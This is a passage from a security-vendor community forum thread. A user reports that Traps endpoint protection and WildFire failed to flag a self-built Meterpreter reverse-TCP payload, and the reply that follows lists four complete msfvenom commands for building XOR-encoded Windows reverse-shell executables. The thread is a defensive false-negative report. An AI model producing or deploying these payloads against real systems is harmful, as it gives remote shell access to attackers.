Payload missed

L2 Linker

Payload missed

Ladies & Gents, 

 

I created a x64 payload.exe (internal testing) this payload creates a reverse_tcp on port 4444. So I uploaded my 'payload.exe' to my test machine with Traps 4.1.3 (39-2454 Content). 

 

Thinking, Traps will shut this down, to my horror it just let it run, in fact Windows Smart Filter triggered at first and let me click on proceed. Which I did and in a few seconds I had a meterpreter session running on my Kali box. 

 

So my concern is why didn't Traps pick up on this? I also uploaded to WF which said it was a benign file, how can a file that opens up a reserve shell be cosnidered benign? 

 

I am not no coder just used the standard tools in Kali, which means if I can anyone can. 

 

Really worrying that Traps let this through :( 

 

Darren

L1 Bithead

Re: Payload missed

I too have had concerns around similar items, as in "wtf, seriously" moments. I know that doesn't help you but just sayin' I share your concern.

L2 Linker

Re: Payload missed

Yep I'm with you. 

 

Biggest concern I have flagged this in WF as the wrong result, and left a message. It would be nice if someone from PA came back and said, yep we have this info and we are working on this or 'OMG you are right, nice spot' 

 

I'm starting to think my over confidence in Traps was misplaced.

 

Darren

L0 Member

Re: Payload missed

What was the hash on the file?

L2 Linker

Re: Payload missed

E53A09E7DA85F128ADFA180428C504262DE14375116197358E7734B113E8F117

 

Darren

L2 Linker

Re: Payload missed

But I can recreate the file and a new hash will be created, so I see that as not a benefit. I would of thought as this is exhibiting certain behaviours that Traps or WF would have picked it out as Traps is supposed to be behavourial not hash look ups.

 

So effectively I could recreate the file 1000 times with same behaviour all with different hashes, but the behaviour would still not picked up. 

 

I would like someone from PA comment on this because I am seriously worried, I know the NGFW will stop the traffic on port 4444 with I am sure with clever thinking that could be bypassed, but the conversation is about Traps stopping odd behaviour before it becomes something else. 

 

PA any comments?

 

Darren

L0 Member

Re: Payload missed

Which options or payload are you using? I'm getting local analysis detections for:

msfvenom -f exe-only -a x64 --platform windows -p windows/x64/shell/reverse_tcp lhost=192.168.1.101 lport=4444  > /tmp/tcp_reverse_4444.exe

msfvenom -f exe-only -a x64 --platform windows -e x64/xor -i 42 -p windows/x64/shell/reverse_tcp lhost=192.168.1.101 lport=4444 > /tmp/tcp_reverse_4444_encode_xor.exe

msfvenom -f exe-only -a x64 --platform windows -e x64/xor -i 42  -p windows/x64/powershell_reverse_tcp lhost=192.168.1.101 lport=4444  > /tmp/tcp_reverse_4444_encode_xor_2.exe

msfvenom -f exe-only -a x64 --platform windows -p windows/x64/powershell_reverse_tcp lhost=192.168.1.101 lport=4444  > /tmp/tcp_reverse_4444_2.exe

L2 Linker

Re: Payload missed

I used a script called 'hacktheworld' installed into Kali, it makes the payload and BOOM! 

 

https://www.youtube.com/watch?v=Z-Kx4Bb3H7s&ab_channel=KaliPentesting

 

But I have done a test again this morning with a new payload and Traps ignored it again and smart screen popped up!! 

 

Please have a go with the script in the video and see how you get on, its quite scary. 

 

Darren

L2 Linker

Re: Payload missed

and yep... 

 

I ran the payload and it connected to my MSF Exploit running on Kali! 

 

And Traps just ignores it... I wish someone from PA would look into this and maje a comment. I know that the payload is effectively just opening up a session its behaviour is malcious or beyond the normal.

 

and Wildfire...

 

WF.JPG

 

As you can see it fails and marks this as benign, which if I flag this as a false positive they will mark this as Maware...

 

Seriously worrying...

Community Team Member

Re: Payload missed

@DarBis, I have notified someone in the traps group about this, but in the meantime, have you contacted support at all about this? Let them know about this as a False Negative?  This would be my first recommendation, as I do not know why it isn't catching on this, but we need to find out why and help fix it.

Stay Secure,
Joe
End of line
Like what you see?

Show your appreciation!

Click Like if a post is helpful to you or if you just want to show your support.

Click Accept as Solution to acknowledge that the answer to your question has been provided.

The button appears next to the replies on topics you’ve started. The member who gave the solution and all future visitors to this topic will appreciate it!

These simple actions take just seconds of your time, but go a long way in showing appreciation for community members and the Live Community as a whole!

The Live Community thanks you for your participation!